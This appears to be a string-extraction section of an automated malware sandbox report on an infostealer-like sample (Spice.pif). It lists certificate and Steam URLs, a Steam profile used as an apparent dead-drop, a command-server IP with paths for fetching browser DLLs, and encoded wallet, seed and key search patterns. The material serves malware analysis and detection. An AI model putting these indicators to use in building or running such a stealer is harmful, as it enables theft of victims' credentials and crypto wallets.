Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 0dN59ZIkEM.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 0dN59ZIkEM.exe	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: 0dN59ZIkEM.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 0dN59ZIkEM.exe	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 0dN59ZIkEM.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 0dN59ZIkEM.exe	String found in binary or memory: http://ocsp.digicert.com0H
Source: 0dN59ZIkEM.exe	String found in binary or memory: http://ocsp.digicert.com0I
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: 0dN59ZIkEM.exe, 00000000.00000003.1354277819.000000000282B000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000000.1408696187.0000000000F39000.00000002.00000001.01000000.00000005.sdmp, Factor.0.dr, Spice.pif.2.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 0dN59ZIkEM.exe	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: mozglue[1].dll.11.dr, mozglue.dll.11.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: Spice.pif, 0000000B.00000002.2627170786.000000001024D000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199677575543[1].htm.11.dr	String found in binary or memory: https://37.27.87.155
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155/
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155/;
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155/GHDGDAKECAKJEHCGDAA
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155/freebl3.dll
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155/freebl3.dll(e
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155/mozglue.dll
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155/msvcp140.dll
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155/nss3.dll
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155/o
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155/p
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155/ramData
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155/softokn3.dll
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000493D000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155/sqln.dll
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155/vcruntime140.dll
Source: Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155AAKKE
Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155CAKJE
Source: Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155CVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY
Source: Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155FBGIIIEBGDGDAKJKKKEBition:
Source: Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155HDHIDGIEBGIJEHIJKFIIition:
Source: Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155KKKEH
Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155VWXYZ12345678900)
Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://37.27.87.155ta
Source: DGDAEHCB.11.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Spice.pif, 0000000B.00000002.2621187844.0000000001790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 76561199677575543[1].htm.11.dr	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: DGDAEHCB.11.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: DGDAEHCB.11.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: DGDAEHCB.11.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=c4Un
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=3gW5J8_jG_Yc&amp
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
Source: 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=XPgJuNunk65
Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.j
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: DGDAEHCB.11.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: DGDAEHCB.11.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: DGDAEHCB.11.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: https://mozilla.org0/
Source: Spice.pif, 0000000B.00000002.2621187844.0000000001790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: 76561199677575543[1].htm.11.dr	String found in binary or memory: https://steamcommunity.com/
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: Spice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/O
Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199677575543[1].htm.11.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199677575543
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: Spice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/o
Source: Spice.pif, 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543
Source: Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543/badges
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543/inventory/
